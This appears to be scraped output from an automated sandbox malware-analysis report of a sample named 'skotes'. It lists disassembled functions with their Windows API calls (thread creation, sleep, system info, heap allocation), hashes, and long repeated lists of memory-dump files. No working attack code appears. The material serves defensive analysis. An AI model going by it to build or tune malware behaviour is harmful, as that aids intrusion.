Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ad8e105b4881633b0233f3d4efb2510337c00af9ebd5d7bbaa27a7130f8cd00a
Instruction ID: 71a1793ad3c6e757ad26297411774eb56caab7b00985fe1babf3416499df1e25
Opcode Fuzzy Hash: ad8e105b4881633b0233f3d4efb2510337c00af9ebd5d7bbaa27a7130f8cd00a
Instruction Fuzzy Hash: 5BE0CD222ED3409DF61033AC6CC7F2D71A8CFD7701F259616FB24C65D18E5C694185A3

Function 00956D00 Relevance: 3.0, APIs: 2, Instructions: 14sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00956D10
Sleep.KERNEL32(00007530), ref: 00956D25

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: f6af949a910cdc8809ea14324eb9fac72abc9aa66eea07ee6b0a9bc7b5883481
Instruction ID: 2b9cb8be1074504cf6eb17b5523eb429e33302cc1a7d17106d228e7143ae964d
Opcode Fuzzy Hash: f6af949a910cdc8809ea14324eb9fac72abc9aa66eea07ee6b0a9bc7b5883481
Instruction Fuzzy Hash: F1D08C307C8314FAF23047616C07F1AAA209B4AF02F654845BB9C3F0D0C1E8310087AC

Function 00948380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00948524

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: f40ab11720c08dc1d3be42bdc90c4e3be24e7b615b8f0cbbe8b720ffad17b6d6
Instruction ID: 57762300ab94ba182c65d080245d50e9e288130d1564706af09268aedda76e30
Opcode Fuzzy Hash: f40ab11720c08dc1d3be42bdc90c4e3be24e7b615b8f0cbbe8b720ffad17b6d6
Instruction Fuzzy Hash: 2E513870D142189BDB24EB68CD85BDEB774EB86314F5042A9F809A72C1EF349E848F91

Function 00977124 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0097705B,?,?,00000000,00000000), ref: 00977166

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: ec5358328ee4147ac908e1bb698d6f5dbb40c7206ce1a43df213b3bdc3f95739
Instruction ID: 2bfa777e9433926a5454ccacff6404ee1fb9ec1897f48641774340f2075b9f7c
Opcode Fuzzy Hash: ec5358328ee4147ac908e1bb698d6f5dbb40c7206ce1a43df213b3bdc3f95739
Instruction Fuzzy Hash: CC111C7290810CABDB10DED5C841EDFB7BCAF49310F919266E915E6180EB30EA09CB61

Function 0097AC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0097AC8D

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8a248d7a8b455691007d8930e054a3c45a49c0796a24a608d50e5701e27db84f
Instruction ID: 430a46b48b848c9fdf00913fd7d11a42827c18e0c3f02a6262fcf43de997973b
Opcode Fuzzy Hash: 8a248d7a8b455691007d8930e054a3c45a49c0796a24a608d50e5701e27db84f
Instruction Fuzzy Hash: C7111872A0420AAFCF05DF58E941A9E7BF9FF88304F054059F809AB351D630DD21DB65

Function 0097D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0097A813,00000001,00000364,00000006,000000FF,?,0095D3FC,9CBA457E,?,00957A8B,?), ref: 0097D871

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
